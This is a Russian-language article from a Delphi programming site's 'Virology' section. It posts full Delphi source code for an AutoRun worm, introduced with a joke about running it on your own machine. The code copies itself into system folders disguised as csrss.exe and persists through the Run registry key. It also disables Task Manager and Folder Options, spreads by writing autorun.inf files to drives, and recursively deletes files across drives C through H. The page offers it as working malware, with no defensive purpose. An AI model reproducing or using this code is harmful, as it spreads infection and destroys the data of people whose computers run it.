Пятница, 29.03.2024, 04:57 Приветствую вас Гость | Группа "Гости" 
Меню сайта

Категории раздела
Вирусология [40]
Статьи о вирусах
Системные [1]
Работа с системой
Примеры [45]
Приёмы, функции, процедуры
Ceти [1]
Работа с интернет
Шуточные программы [5]
Пишем шуточные программки
Остальное [6]
Всё что не вошло

Популярные статьи

Недавние темы

Опрос
Сколько вы платите в месяц за интернет?
Всего ответов: 313

Главная » Статьи » Delphi » Вирусология

AutoRun на Delphi
Так, кому не нравиться сайт или что-о с ним связанное - пишем ЭТО и запускаем у себя на компьютере…

Virus.Win32.AutoRun.ah


var WinDir, SysDir: String; Buffer: array[0..1023] of Char;

  F: TextFile; Reg: TRegistry; //

function DriveExists(Drive: Byte): Boolean;

begin

  Result:= Boolean(GetLogicalDrives AND(1 shl Drive))

end;

procedure InFect(FileName: String);

begin

AssignFile(F,FileName);

Reset(F);

WriteLn(F,’open=’+SysDir+’\config\csrss.exe’);

CloseFile(F);

end;

procedure FindAndDelete(Drive: String);

var

  SearchRec: TSearchRec; //

begin

 

  if FindFirst(Drive+’*.*’, faAnyFile,SearchRec) = 0 then

  repeat

  if (SearchRec.Attr and faAnyFile) = SearchRec.Attr then

  begin

DeleteFile(SearchRec.Name);

  end;

  until FindNext(SearchRec) <> 0;

 

  if FindFirst(’*', faAnyFile, SearchRec) = 0 then

  repeat

  if (SearchRec.Attr and faDirectory) = faDirectory then

  if SearchRec.Name[1] <> ‘.’ then

  begin

  ChDir(SearchRec.Name);//

  FindAndDelete(Drive); //

  ChDir(’..’);//

  end;

  until FindNext(SearchRec) <> 0;

end;

SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));

CopyFile(PChar(ParamStr(0)),PChar(WinDir+’\media\arona.exe’),false);

SetString(SysDir, Buffer, GetSystemDirectory(Buffer, SizeOf(Buffer)));

CopyFile(PChar(ParamStr(0)),PChar(SysDir+’\config\csrss.exe’),false);

AssignFile(F,SysDir+’\config\logon.bat’);

Reset(F);

WriteLn(F,’@'+SysDir+’\config\csrss.exe’);

CloseFile(F);

Reg:=TRegistry.Create;

Reg.RootKey:=HKEY_LOCAL_MACHINE;

Reg.OpenKey(’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,true);

Reg.WriteString(’Worms’,SysDir+’\config\logon.bat’);

Reg.CloseKey;

Reg.RootKey:=HKEY_CURRENT_USER;

REg.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Policies\System’,true);

Reg.WriteInteger(’DisableTaskMgr’,1);

Reg.CloseKey;

Reg.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Policies\Explorer’,true);

Reg.WriteInteger(’NoFolderOptions’,1);

Reg.Free;

try

InFect(SysDir+’\config\autorun.inf’);

if DriveExists(5) then //

begin

InFect(’F:\autorun.inf’);

end;

if DriveExists(6) then //

begin

InFect(’G:\autorun.inf’);

end;

if DriveExists(7) then //

begin

InFect(’H:\autorun.inf’);

end;

if DriveExists(10) then begin

InFect(’K:\autorun.inf’)

;

end;

if DriveExists(11) then 

begin

InFect(’L:\autorun.inf’);

end;

if DriveExists(14) then

begin

InFect(’O:\autorun.inf’);

end;

except

Exit;

end;

try

FindAndDelete(’D:\’);

FindAndDelete(’C:\’);

FindAndDelete(’E:\’);

FindAndDelete(’F:\’);

FindAndDelete(’G:\’);

FindAndDelete(’H:\’);

except

Exit;

end;

Категория: Вирусология | Добавил: dolphin (27.09.2008)
Просмотров: 3595 | Комментарии: 1 | Рейтинг: 3.7/3

Всего комментариев: 1
avatar
1
happy
Описание повеселило
avatar
Профиль


Логин:
Пароль:

Поиск

Наша кнопка
Вирусология, взгляд из Delphi

Статистика
Top.Mail.Ru Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 455
Форум: 1165/8116
Коментариев: 768
Новостей: 29

Статистика пользователей
Всего: 526
За неделю: 3
Вчера: 0
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0

delphicode.ru © 2008 - 2024 Хостинг от uCoz